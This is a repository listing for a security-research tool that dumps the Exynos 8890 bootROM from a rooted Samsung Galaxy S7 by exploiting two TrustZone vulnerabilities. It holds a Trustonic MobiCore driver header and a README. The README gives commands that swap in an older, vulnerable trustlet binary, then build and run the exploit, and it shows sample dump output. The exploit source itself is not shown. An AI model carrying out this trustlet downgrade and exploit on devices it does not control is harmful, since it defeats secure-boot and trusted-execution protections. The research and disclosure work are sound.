├── G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin ├── G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin ├── MobiCoreDriverApi.h ├── README.md ├── g930f_dump-bootrom.c ├── mcSpid.h ├── mcUuid.h └── mcVersionInfo.h /G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/frederic/exynos8890-bootrom-dump/818b1bc84b697c46d3cfaa6df1d52f834d98d55d/G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin -------------------------------------------------------------------------------- /G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/frederic/exynos8890-bootrom-dump/818b1bc84b697c46d3cfaa6df1d52f834d98d55d/G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin -------------------------------------------------------------------------------- /MobiCoreDriverApi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2014 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | /** 32 | * MobiCore Driver API. 33 | * 34 | * The MobiCore (MC) Driver API provides access functions to the t-base trusted execution environment and the contained Trusted Applications. 35 | */ 36 | #ifndef MCDRIVER_H_ 37 | #define MCDRIVER_H_ 38 | 39 | #if (!defined(__MC_CLIENT_LIB_API)) && __cplusplus 40 | #define __MC_CLIENT_LIB_API extern "C" 41 | #else 42 | #define __MC_CLIENT_LIB_API 43 | #endif // __cplusplus 44 | 45 | 46 | #include 47 | #ifndef WIN32 48 | #include 49 | #endif 50 | 51 | #include "mcUuid.h" 52 | #include "mcSpid.h" 53 | #include "mcVersionInfo.h" 54 | 55 | /* 56 | * MobiCore driver API error codes. 57 | * MAJOR part of error code is stable. 58 | * MCP part contains MCP result code. See MCI/mcimcp.h 59 | * DETAIL part may be used in testing for specific error code. 60 | * 61 | * Detail error codes may change in different releases 62 | * Please do not test DETAIL part when comparing error codes. 63 | */ 64 | #define MC_DRV_ERROR_MAJOR(ecode) ((ecode) & 0xFF) /**< Get MAJOR part of error code. */ 65 | #define MC_DRV_ERROR_MCP(ecode) (((ecode)>>8) & 0xFF) /**< Get MCP part of error code. */ 66 | #define MC_DRV_ERROR_DETAIL(ecode) (((ecode)>>16) & 0x0FFF) /**< Get detail part of error code. */ 67 | 68 | typedef uint32_t mcResult_t; 69 | /** 70 | * Return values of MobiCore driver functions. 71 | */ 72 | #define MC_DRV_OK 0x00000000 /**< Function call succeeded. */ 73 | #define MC_DRV_NO_NOTIFICATION 0x00000001 /**< No notification available. */ 74 | #define MC_DRV_ERR_NOTIFICATION 0x00000002 /**< Error during notification on communication level. */ 75 | #define MC_DRV_ERR_NOT_IMPLEMENTED 0x00000003 /**< Function not implemented. */ 76 | #define MC_DRV_ERR_OUT_OF_RESOURCES 0x00000004 /**< No more resources available. */ 77 | #define MC_DRV_ERR_INIT 0x00000005 /**< Driver initialization failed. */ 78 | #define MC_DRV_ERR_UNKNOWN 0x00000006 /**< Unknown error. */ 79 | #define MC_DRV_ERR_UNKNOWN_DEVICE 0x00000007 /**< The specified device is unknown. */ 80 | #define MC_DRV_ERR_UNKNOWN_SESSION 0x00000008 /**< The specified session is unknown. */ 81 | #define MC_DRV_ERR_INVALID_OPERATION 0x00000009 /**< The specified operation is not allowed. */ 82 | #define MC_DRV_ERR_INVALID_RESPONSE 0x0000000a /**< The response header from the MC is invalid. */ 83 | #define MC_DRV_ERR_TIMEOUT 0x0000000b /**< Function call timed out. */ 84 | #define MC_DRV_ERR_NO_FREE_MEMORY 0x0000000c /**< Can not allocate additional memory. */ 85 | #define MC_DRV_ERR_FREE_MEMORY_FAILED 0x0000000d /**< Free memory failed. */ 86 | #define MC_DRV_ERR_SESSION_PENDING 0x0000000e /**< Still some open sessions pending. */ 87 | #define MC_DRV_ERR_DAEMON_UNREACHABLE 0x0000000f /**< MC daemon not reachable */ 88 | #define MC_DRV_ERR_INVALID_DEVICE_FILE 0x00000010 /**< The device file of the kernel module could not be opened. */ 89 | #define MC_DRV_ERR_INVALID_PARAMETER 0x00000011 /**< Invalid parameter. */ 90 | #define MC_DRV_ERR_KERNEL_MODULE 0x00000012 /**< Error from Kernel Module, see DETAIL for errno. */ 91 | #define MC_DRV_ERR_BULK_MAPPING 0x00000013 /**< Error during mapping of additional bulk memory to session. */ 92 | #define MC_DRV_ERR_BULK_UNMAPPING 0x00000014 /**< Error during unmapping of additional bulk memory to session. */ 93 | #define MC_DRV_INFO_NOTIFICATION 0x00000015 /**< Notification received, exit code available. */ 94 | #define MC_DRV_ERR_NQ_FAILED 0x00000016 /**< Set up of NWd connection failed. */ 95 | 96 | #define MC_DRV_ERR_DAEMON_VERSION 0x00000017 /**< Wrong daemon version. */ 97 | #define MC_DRV_ERR_CONTAINER_VERSION 0x00000018 /**< Wrong container version. */ 98 | 99 | // those should become MCP or even detail codes on top of MC_DRV_ERR_MCP_ERROR 100 | #define MC_DRV_ERR_WRONG_PUBLIC_KEY 0x00000019 /**< System Trustlet public key is wrong. */ 101 | #define MC_DRV_ERR_CONTAINER_TYPE_MISMATCH 0x0000001a /**< Wrong container type(s). */ 102 | #define MC_DRV_ERR_CONTAINER_LOCKED 0x0000001b /**< Container is locked (or not activated). */ 103 | #define MC_DRV_ERR_SP_NO_CHILD 0x0000001c /**< SPID is not registered with root container. */ 104 | #define MC_DRV_ERR_TL_NO_CHILD 0x0000001d /**< UUID is not registered with sp container. */ 105 | #define MC_DRV_ERR_UNWRAP_ROOT_FAILED 0x0000001e /**< Unwrapping of root container failed. */ 106 | #define MC_DRV_ERR_UNWRAP_SP_FAILED 0x0000001f /**< Unwrapping of service provider container failed. */ 107 | #define MC_DRV_ERR_UNWRAP_TRUSTLET_FAILED 0x00000020 /**< Unwrapping of Trustlet container failed. */ 108 | 109 | // use separate numbers for those in the future 110 | #define MC_DRV_ERR_DEVICE_ALREADY_OPEN MC_DRV_ERR_INVALID_OPERATION /** < Device is already open. */ 111 | #define MC_DRV_ERR_SOCKET_CONNECT MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket not reachable. */ 112 | #define MC_DRV_ERR_SOCKET_WRITE MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket write error. */ 113 | #define MC_DRV_ERR_SOCKET_READ MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket read error. */ 114 | #define MC_DRV_ERR_SOCKET_LENGTH MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket read error. */ 115 | #define MC_DRV_ERR_DAEMON_SOCKET MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon had problems with socket. */ 116 | #define MC_DRV_ERR_DEVICE_FILE_OPEN MC_DRV_ERR_INVALID_DEVICE_FILE /**< The device file of the kernel module could not be opened. */ 117 | #define MC_DRV_ERR_NULL_POINTER MC_DRV_ERR_INVALID_PARAMETER /**< Null pointer passed as parameter. */ 118 | #define MC_DRV_ERR_TCI_TOO_BIG MC_DRV_ERR_INVALID_PARAMETER /**< Requested TCI length is too high. */ 119 | #define MC_DRV_ERR_WSM_NOT_FOUND MC_DRV_ERR_INVALID_PARAMETER /**< Requested TCI was not allocated with mallocWsm(). */ 120 | #define MC_DRV_ERR_TCI_GREATER_THAN_WSM MC_DRV_ERR_INVALID_PARAMETER /**< Requested TCI length is bigger than allocated WSM. */ 121 | #define MC_DRV_ERR_TRUSTLET_NOT_FOUND MC_DRV_ERR_INVALID_DEVICE_FILE /** < Trustlet could not be found. */ 122 | #define MC_DRV_ERR_TRUSTED_APPLICATION_NOT_FOUND MC_DRV_ERR_TRUSTLET_NOT_FOUND /** < Trusted Application could not be found. */ 123 | #define MC_DRV_ERR_DAEMON_KMOD_ERROR MC_DRV_ERR_DAEMON_UNREACHABLE /**< Daemon cannot use Kernel module as expected. */ 124 | #define MC_DRV_ERR_DAEMON_MCI_ERROR MC_DRV_ERR_DAEMON_UNREACHABLE /**< Daemon cannot use MCI as expected. */ 125 | #define MC_DRV_ERR_MCP_ERROR MC_DRV_ERR_DAEMON_UNREACHABLE /**< MobiCore Control Protocol error. See MC_DRV_ERROR_MCP(). */ 126 | #define MC_DRV_ERR_INVALID_LENGTH MC_DRV_ERR_NO_FREE_MEMORY /**< Invalid length. */ 127 | #define MC_DRV_ERR_KMOD_NOT_OPEN MC_DRV_ERR_NO_FREE_MEMORY /**< Device not open. */ 128 | #define MC_DRV_ERR_BUFFER_ALREADY_MAPPED MC_DRV_ERR_BULK_MAPPING /**< Buffer is already mapped to this Trusted Application. */ 129 | #define MC_DRV_ERR_BLK_BUFF_NOT_FOUND MC_DRV_ERR_BULK_UNMAPPING /**< Unable to find internal handle for buffer. */ 130 | 131 | #define MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN 0x00000021 /**< No device associated with connection. */ 132 | #define MC_DRV_ERR_DAEMON_WSM_HANDLE_NOT_FOUND MC_DRV_ERR_WSM_NOT_FOUND /**< Daemon could not find WSM handle. */ 133 | #define MC_DRV_ERR_DAEMON_UNKNOWN_SESSION MC_DRV_ERR_UNKNOWN_SESSION /**< The specified session is unknown to Daemon. */ 134 | 135 | #if TBASE_API_LEVEL >= 3 136 | // Installation errors 137 | #define MC_DRV_ERR_TA_HEADER_ERROR 0x00000021 /**< TA blob header is incorrect. */ 138 | #define MC_DRV_ERR_TA_ATTESTATION_ERROR 0x00000022 /**< TA blob attestation is incorrect. */ 139 | #endif /* TBASE_API_LEVEL */ 140 | 141 | #define MC_DRV_ERR_INTERRUPTED_BY_SIGNAL 0x00000023 /**< Interrupted system call. */ 142 | 143 | #if TBASE_API_LEVEL >= 5 144 | /** 145 | * Do we call these RESERVED_1, _2 etc? (as this file is public, or do we wash it?) 146 | */ 147 | #define MC_DRV_ERR_SERVICE_BLOCKED 0x00000024 /**< Service is blocked and opensession is thus not allowed. */ 148 | #define MC_DRV_ERR_SERVICE_LOCKED 0x00000025 /**< Service is locked and opensession is thus not allowed. */ 149 | #define MC_DRV_ERR_SERVICE_KILLED 0x00000026 /**< Service was killed by the TEE (due to an administrative command). */ 150 | #define MC_DRV_ERR_NO_FREE_INSTANCES 0x00000027 /**< All permitted instances to the service are used */ 151 | 152 | #endif /* TBASE_API_LEVEL >= 5 */ 153 | 154 | #define MAKE_MC_DRV_MCP_ERROR(mcpCode) (MC_DRV_ERR_MCP_ERROR | ((mcpCode&0x000FFFFF)<<8)) 155 | #define MAKE_MC_DRV_KMOD_WITH_ERRNO(theErrno) (MC_DRV_ERR_KERNEL_MODULE| (((theErrno)&0x0000FFFF)<<16)) 156 | 157 | /** Structure of Session Handle, includes the Session ID and the Device ID the Session belongs to. 158 | * The session handle will be used for session-based t-base communication. 159 | * It will be passed to calls which address a communication end point in the t-base environment. 160 | */ 161 | typedef struct { 162 | uint32_t sessionId; /**< t-base session ID */ 163 | uint32_t deviceId; /**< Device ID the session belongs to */ 164 | } mcSessionHandle_t; 165 | 166 | /** Information structure about additional mapped Bulk buffer between the Client Application (NWd) and 167 | * the Trusted Application (SWd). This structure is initialized from a Client Application by calling mcMap(). 168 | * In order to use the memory within a Trusted Application the Client Application has to inform the Trusted Application with 169 | * the content of this structure via the TCI. 170 | */ 171 | 172 | typedef struct { 173 | #if ( __WORDSIZE == 64 ) 174 | uint32_t sVirtualAddr; /**< The virtual address of the Bulk buffer regarding the address space of the Trusted Application, already includes a possible offset! */ 175 | #else 176 | void *sVirtualAddr; 177 | #endif 178 | uint32_t sVirtualLen; /**< Length of the mapped Bulk buffer */ 179 | } mcBulkMap_t; 180 | 181 | 182 | 183 | #define MC_DEVICE_ID_DEFAULT 0 /**< The default device ID */ 184 | #define MC_INFINITE_TIMEOUT ((int32_t)(-1)) /**< Wait infinite for a response of the MC. */ 185 | #define MC_INFINITE_TIMEOUT_INTERRUPTIBLE ((int32_t)(-2)) /**< Wait infinite for a response of the MC, exit on signal. */ 186 | #define MC_NO_TIMEOUT 0 /**< Do not wait for a response of the MC. */ 187 | #define MC_MAX_TCI_LEN 0x100000 /**< TCI/DCI must not exceed 1MiB */ 188 | 189 | #ifndef WIN32 190 | /* Mark only the following functions for export */ 191 | #pragma GCC visibility push(default) 192 | #endif 193 | 194 | /** Open a new connection to a t-base device. 195 | * 196 | * mcOpenDevice() initializes all device specific resources required to communicate 197 | * with an t-base instance located on the specified device in the system. If the device 198 | * does not exist the function will return MC_DRV_ERR_UNKNOWN_DEVICE. 199 | * 200 | * @param [in] deviceId Identifier for the t-base device to be used. MC_DEVICE_ID_DEFAULT refers to the default device. 201 | * 202 | * @return MC_DRV_OK if operation has been successfully completed. 203 | * @return MC_DRV_ERR_INVALID_OPERATION if device already opened. 204 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 205 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when deviceId is unknown. 206 | * @return MC_DRV_ERR_INVALID_DEVICE_FILE if kernel module under /dev/mobicore cannot be opened 207 | * 208 | * Uses a Mutex. 209 | */ 210 | __MC_CLIENT_LIB_API mcResult_t mcOpenDevice( 211 | uint32_t deviceId 212 | ); 213 | 214 | /** Close the connection to a t-base device. 215 | * When closing a device, active sessions have to be closed beforehand. 216 | * Resources associated with the device will be released. 217 | * The device may be opened again after it has been closed. 218 | * 219 | * @param [in] deviceId Identifier for the t-base device. MC_DEVICE_ID_DEFAULT refers to the default device. 220 | * 221 | * @return MC_DRV_OK if operation has been successfully completed. 222 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 223 | * @return MC_DRV_ERR_SESSION_PENDING when a session is still open. 224 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 225 | * 226 | * Uses a Mutex. 227 | */ 228 | __MC_CLIENT_LIB_API mcResult_t mcCloseDevice( 229 | uint32_t deviceId 230 | ); 231 | 232 | /** Open a new session to a Trusted Application. The Trusted Application with the given UUID has to be available in the flash filesystem. 233 | * 234 | * Write MCP open message to buffer and notify t-base about the availability of a new command. 235 | * Waits till t-base responds with the new session ID (stored in the MCP buffer). 236 | * 237 | * @param [in,out] session On success, the session data will be returned. Note that session.deviceId has to be the device id of an opened device. 238 | * @param [in] uuid UUID of the Trusted Application to be opened. 239 | * @param [in] tci TCI buffer for communicating with the Trusted Application. 240 | * @param [in] tciLen Length of the TCI buffer. Maximum allowed value is MC_MAX_TCI_LEN. 241 | * 242 | * @return MC_DRV_OK if operation has been successfully completed. 243 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 244 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 245 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon socket occur. 246 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when daemon returns an error. 247 | * @return MC_DRV_ERR_TRUSTED_APPLICATION_NOT_FOUND when Trusted Application or driver cannot be loaded. 248 | * 249 | * Uses a Mutex. 250 | */ 251 | __MC_CLIENT_LIB_API mcResult_t mcOpenSession( 252 | mcSessionHandle_t *session, 253 | const mcUuid_t *uuid, 254 | uint8_t *tci, 255 | uint32_t tciLen 256 | ); 257 | 258 | /** Open a new session to a Trusted Application(Trustlet). The Trusted Application will be loaded from the memory buffer. 259 | * 260 | * Write MCP open message to buffer and notify t-base about the availability of a new command. 261 | * Waits till t-base responds with the new session ID (stored in the MCP buffer). 262 | * 263 | * @param [in,out] session On success, the session data will be returned. Note that session.deviceId has to be the device id of an opened device. 264 | * @param [in] spid Service Provider ID(for Service provider trustlets otherwise ignored) 265 | * @param [in] trustedapp memory buffer containing the Trusted Application binary 266 | * @param [in] tlen length of the memory buffer containing the Trusted Application 267 | * @param [in] tci TCI buffer for communicating with the Trusted Application. 268 | * @param [in] tciLen Length of the TCI buffer. Maximum allowed value is MC_MAX_TCI_LEN. 269 | * 270 | * @return MC_DRV_OK if operation has been successfully completed. 271 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 272 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 273 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon socket occur. 274 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when daemon returns an error. 275 | * @return MC_DRV_ERR_TRUSTED_APPLICATION_NOT_FOUND when Trusted Application cannot be loaded. 276 | * 277 | * Uses a Mutex. 278 | */ 279 | __MC_CLIENT_LIB_API mcResult_t mcOpenTrustlet( 280 | mcSessionHandle_t *session, 281 | mcSpid_t spid, 282 | uint8_t *trustedapp, 283 | uint32_t tLen, 284 | uint8_t *tci, 285 | uint32_t tciLen 286 | ); 287 | 288 | 289 | /** Close a Trusted Application session. 290 | * 291 | * Closes the specified t-base session. The call will block until the session has been closed. 292 | * 293 | * @pre Device deviceId has to be opened in advance. 294 | * 295 | * @param [in] session Session to be closed. 296 | * 297 | * @return MC_DRV_OK if operation has been successfully completed. 298 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 299 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 300 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 301 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 302 | * @return MC_DRV_ERR_INVALID_DEVICE_FILE when daemon cannot open trustlet file. 303 | * 304 | * Uses a Mutex. 305 | */ 306 | __MC_CLIENT_LIB_API mcResult_t mcCloseSession( 307 | mcSessionHandle_t *session 308 | ); 309 | 310 | /** Notify a session. 311 | * Notifies the session end point about available message data. 312 | * If the session parameter is correct, notify will always succeed. 313 | * Corresponding errors can only be received by mcWaitNotification(). 314 | * @pre A session has to be opened in advance. 315 | * 316 | * @param session The session to be notified. 317 | * 318 | * @return MC_DRV_OK if operation has been successfully completed. 319 | * @return MC_DRV_INVALID_PARAMETER if session parameter is invalid. 320 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 321 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 322 | */ 323 | __MC_CLIENT_LIB_API mcResult_t mcNotify( 324 | mcSessionHandle_t *session 325 | ); 326 | 327 | /** Wait for a notification. 328 | * 329 | * Wait for a notification issued by t-base for a specific session. 330 | * The timeout parameter specifies the number of milliseconds the call will wait for a notification. 331 | * If the caller passes 0 as timeout value the call will immediately return. If timeout value is below 0 the call will block 332 | * until a notification for the session has been received. 333 | * 334 | * @attention if timeout is below 0, call will block: 335 | * Caller has to trust the other side to send a notification to wake him up again. 336 | * 337 | * @param [in] session The session the notification should correspond to. 338 | * @param [in] timeout Time in milliseconds to wait (MC_NO_TIMEOUT : direct return, > 0 : milliseconds, MC_INFINITE_TIMEOUT : wait indefinitely, MC_INFINITE_TIMEOUT_INTERRUPTIBLE : wait indefinitely except if signal received) 339 | * 340 | * @return MC_DRV_OK if notification is available. 341 | * @return MC_DRV_ERR_TIMEOUT if no notification arrived in time. 342 | * @return MC_DRV_INFO_NOTIFICATION if a problem with the session was encountered. Get more details with mcGetSessionErrorCode(). 343 | * @return MC_DRV_ERR_NOTIFICATION if a problem with the socket occurred. 344 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 345 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 346 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 347 | */ 348 | __MC_CLIENT_LIB_API mcResult_t mcWaitNotification( 349 | mcSessionHandle_t *session, 350 | int32_t timeout 351 | ); 352 | 353 | /** 354 | * Allocate a block of world shared memory (WSM). 355 | * The MC driver allocates a contiguous block of memory which can be used as WSM. 356 | * This implicates that the allocated memory is aligned according to the alignment parameter. 357 | * Always returns a buffer of size WSM_SIZE aligned to 4K. 358 | * 359 | * @param [in] deviceId The ID of an opened device to retrieve the WSM from. 360 | * @param [in] align The alignment (number of pages) of the memory block (e.g. 0x00000001 for 4kB). 361 | * @param [in] len Length of the block in bytes. 362 | * @param [out] wsm Virtual address of the world shared memory block. 363 | * @param [in] wsmFlags Platform specific flags describing the memory to be allocated. 364 | * 365 | * @attention: align and wsmFlags are currently ignored 366 | * 367 | * @return MC_DRV_OK if operation has been successfully completed. 368 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 369 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 370 | * @return MC_DRV_ERR_NO_FREE_MEMORY if no more contiguous memory is available in this size or for this process. 371 | * 372 | * Uses a Mutex. 373 | */ 374 | __MC_CLIENT_LIB_API mcResult_t mcMallocWsm( 375 | uint32_t deviceId, 376 | uint32_t align, 377 | uint32_t len, 378 | uint8_t **wsm, 379 | uint32_t wsmFlags 380 | ); 381 | 382 | /** 383 | * Free a block of world shared memory (WSM). 384 | * The MC driver will free a block of world shared memory (WSM) previously allocated with 385 | * mcMallocWsm(). The caller has to assure that the address handed over to the driver 386 | * is a valid WSM address. 387 | * 388 | * @param [in] deviceId The ID to which the given address belongs. 389 | * @param [in] wsm Address of WSM block to be freed. 390 | * 391 | * @return MC_DRV_OK if operation has been successfully completed. 392 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 393 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id is invalid. 394 | * @return MC_DRV_ERR_FREE_MEMORY_FAILED on failures. 395 | * 396 | * Uses a Mutex. 397 | */ 398 | __MC_CLIENT_LIB_API mcResult_t mcFreeWsm( 399 | uint32_t deviceId, 400 | uint8_t *wsm 401 | ); 402 | 403 | /** 404 | * Map additional bulk buffer between a Client Application (CA) and the Trusted Application (TA) for a session. 405 | * Memory allocated in user space of the CA can be mapped as additional communication channel 406 | * (besides TCI) to the Trusted Application. Limitation of the Trusted Application memory structure apply: only 6 chunks can be mapped 407 | * with a maximum chunk size of 1 MiB each. 408 | * 409 | * @attention It is up to the application layer (CA) to inform the Trusted Application about the additional mapped bulk memory. 410 | * 411 | * @param [in] session Session handle with information of the deviceId and the sessionId. The 412 | * given buffer is mapped to the session specified in the sessionHandle. 413 | * @param [in] buf Virtual address of a memory portion (relative to CA) to be shared with the Trusted Application, already includes a possible offset! 414 | * @param [in] len length of buffer block in bytes. 415 | * @param [out] mapInfo Information structure about the mapped Bulk buffer between the CA (NWd) and 416 | * the TA (SWd). 417 | * 418 | * @return MC_DRV_OK if operation has been successfully completed. 419 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 420 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 421 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 422 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 423 | * @return MC_DRV_ERR_BULK_MAPPING when buf is already uses as bulk buffer or when registering the buffer failed. 424 | * 425 | * Uses a Mutex. 426 | */ 427 | __MC_CLIENT_LIB_API mcResult_t mcMap( 428 | mcSessionHandle_t *session, 429 | void *buf, 430 | uint32_t len, 431 | mcBulkMap_t *mapInfo 432 | ); 433 | 434 | /** 435 | * Remove additional mapped bulk buffer between Client Application (CA) and the Trusted Application (TA) for a session. 436 | * 437 | * @attention The bulk buffer will immediately be unmapped from the session context. 438 | * @attention The application layer (CA) must inform the TA about unmapping of the additional bulk memory before calling mcUnmap! 439 | * 440 | * @param [in] session Session handle with information of the deviceId and the sessionId. The 441 | * given buffer is unmapped from the session specified in the sessionHandle. 442 | * @param [in] buf Virtual address of a memory portion (relative to CA) shared with the TA, already includes a possible offset! 443 | * @param [in] mapInfo Information structure about the mapped Bulk buffer between the CA (NWd) and 444 | * the TA (SWd). 445 | * @attention The clientlib currently ignores the len field in mapInfo. 446 | * 447 | * @return MC_DRV_OK if operation has been successfully completed. 448 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 449 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 450 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 451 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 452 | * @return MC_DRV_ERR_BULK_UNMAPPING when buf was not registered earlier or when unregistering failed. 453 | * 454 | * Uses a Mutex. 455 | */ 456 | __MC_CLIENT_LIB_API mcResult_t mcUnmap( 457 | mcSessionHandle_t *session, 458 | void *buf, 459 | mcBulkMap_t *mapInfo 460 | ); 461 | 462 | /** 463 | * Get additional error information of the last error that occurred on a session. 464 | * After the request the stored error code will be deleted. 465 | * 466 | * @param [in] session Session handle with information of the deviceId and the sessionId. 467 | * @param [out] lastErr >0 Trusted Application has terminated itself with this value, <0 Trusted Application is dead because of an error within t-base (e.g. Kernel exception). 468 | * See also notificationPayload_t enum in MCI definition at "mcinq.h". 469 | * 470 | * @return MC_DRV_OK if operation has been successfully completed. 471 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 472 | * @return MC_DRV_ERR_UNKNOWN_SESSION when session id is invalid. 473 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid. 474 | */ 475 | __MC_CLIENT_LIB_API mcResult_t mcGetSessionErrorCode( 476 | mcSessionHandle_t *session, 477 | int32_t *lastErr 478 | ); 479 | 480 | /** 481 | * Get t-base version information of a device. 482 | * 483 | * @param [in] deviceId of an open device. 484 | * @param [out] versionInfo t-base version info. 485 | * 486 | * @return MC_DRV_OK if operation has been successfully completed. 487 | * @return MC_DRV_ERR_UNKNOWN_DEVICE when device is not open. 488 | * @return MC_DRV_INVALID_PARAMETER if a parameter is invalid. 489 | * @return MC_DRV_ERR_DAEMON_UNREACHABLE when problems with daemon occur. 490 | */ 491 | __MC_CLIENT_LIB_API mcResult_t mcGetMobiCoreVersion( 492 | uint32_t deviceId, 493 | mcVersionInfo_t *versionInfo 494 | ); 495 | #ifndef WIN32 496 | #pragma GCC visibility pop 497 | #endif 498 | #endif /** MCDRIVER_H_ */ 499 | 500 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # [Exynos 8890 BootROM dump tool](https://github.com/frederic/exynos8890-bootrom-dump) 2 | This tool allows to dump the Exynos 8890 bootROM from a Samsung Galaxy S7 phone by exploiting two trustzone vulnerabilities. 3 | 4 | # [description](https://fredericb.info/2020/06/exynos8890-bootrom-dump-dump-exynos-8890-bootrom-from-samsung-galaxy-s7.html) 5 | 6 | # target 7 | Samsung Galaxy S7 (G930F) - G930FXXU2DRD1 - root/SU enabled 8 | 9 | # setup 10 | ``` 11 | $ adb pull /system/vendor/lib/libMcClient.so . 12 | $ adb pull /system/app/mcRegistry/ffffffffd00000000000000000000004.tlbin ffffffffd00000000000000000000004.tlbin.backup 13 | $ adb push ./G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin /data/local/tmp/ 14 | $ adb push ./G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin /data/local/tmp/ 15 | $ adb shell "su -c mount -o rw,remount /system" 16 | $ adb shell "su cp /data/local/tmp/G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin /system/app/mcRegistry/ffffffffd00000000000000000000004.tlbin" 17 | $ adb shell "su -c mount -o ro,remount /system" 18 | ``` 19 | # build 20 | ``` 21 | $ ~/tools/android/android-ndk-r20/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi21-clang ./g930f_dump-bootrom.c -L./ -lMcClient -o g930f_dump-bootrom 22 | $ adb push ./g930f_dump-bootrom /data/local/tmp/ 23 | ``` 24 | 25 | # usage 26 | Dump size is 0x1000 bytes. Read address is specified in argument: 27 | ``` 28 | herolte:/data/local/tmp # ./g930f_dump-bootrom 0 29 | [+] Address in TA virtual memory : 0x200000 (0xa000 bytes) 30 | Dumped to file dump_0x0.bin 31 | BB0038D57B0F78927F0300F141000054FC7F83147BFF48D3FD031EAAC9640094FC0314AA74070058940240B97407005814C01ED5740700589F0200B91D650094A2600094DD650094D0630094556400945640A0D2150080D27F0300F141000054950080D2B5021C8BD40A158BBF0217EB41940C545F111ED599050058390340B9390300123F07007161000054B764009402000014CD640094C0040058E9640094C2040058430040B97F00067241000054B2600094600400581F00009160040058950000946004005881040058A30400581F0001EBC00000543F0003EB80000054024440B8224400B8FCFFFF17E1030[...] 32 | ``` 33 